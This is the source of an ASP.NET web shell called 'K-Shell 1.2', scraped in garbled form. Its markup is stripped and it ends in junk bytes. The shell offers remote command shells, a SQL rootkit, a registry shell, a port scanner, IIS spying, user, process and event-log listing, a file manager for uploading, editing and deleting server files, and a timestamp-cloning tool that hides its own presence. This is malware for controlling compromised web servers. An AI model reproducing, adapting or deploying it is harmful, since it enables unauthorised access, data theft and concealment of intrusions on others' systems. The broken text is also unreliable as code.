%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <% if request.QueryString("action")="down" and session("usersession")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %>
Currently Dir: | <%=url%> | |
Operate: | New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit | |
Go to: | <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> | <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %> |
Tool: | SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2 | |
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Registry Shell - Application Event Log - System Log |
Name | Size | ModifyTime | Operate |
<% guru= " | |||
|Parent Directory| | |||
" & xdir.name & " | " response.Write(guru) response.Write("" & Directory.GetLastWriteTime(url & xdir.name) & " | ") guru="Cut" & "|Copy|Del | " response.Write(guru) response.Write("|
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write(" | |||
" & xfile.name & " | " response.Write(guru) guru="" & GetSize(xfile.length) & " | " response.Write(guru) response.Write("" & file.GetLastWriteTime(url & xfile.name) & " | ") guru="Edit|Cut|Copy|Rename|Download|Del | " response.Write(guru) response.Write("
Server IP | <%=request.ServerVariables("LOCAL_ADDR")%> |
Machine Name | <%=Environment.MachineName%> |
Network Name | <%=Environment.UserDomainName.ToString()%> |
User Name in this Process | <%=Environment.UserName%> |
OS Version | <%=Environment.OSVersion.ToString()%> |
Started Time | <%=GetStartedTime(Environment.Tickcount)%> Hours |
System Time | <%=now%> |
IIS Version | <%=request.ServerVariables("SERVER_SOFTWARE")%> |
HTTPS | <%=request.ServerVariables("HTTPS")%> |
PATH_INFO | <%=request.ServerVariables("PATH_INFO")%> |
PATH_TRANSLATED | <%=request.ServerVariables("PATH_TRANSLATED")%> |
SERVER_PORT | <%=request.ServerVariables("SERVER_PORT")%> |
SeesionID | <%=Session.SessionID%> |
Client Infomation | |
Client Proxy | <%=CP%> |
Client IP | <%=CIP%> |
User | <%=request.ServerVariables("HTTP_USER_AGENT")%> |
[ IIS Spy ] Back
<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>[ SQL Tool ] Back
<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %> <% case "sqlman" %> <% case "sqlrootkit" %> <% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %> Go Back <% case "new" url=request.QueryString("src") %> Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %> Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %> Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %> Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %><% case "logout" session.Abandon() response.Write(" ÿÿÿÿÿÿÿÿÿÿÿÿ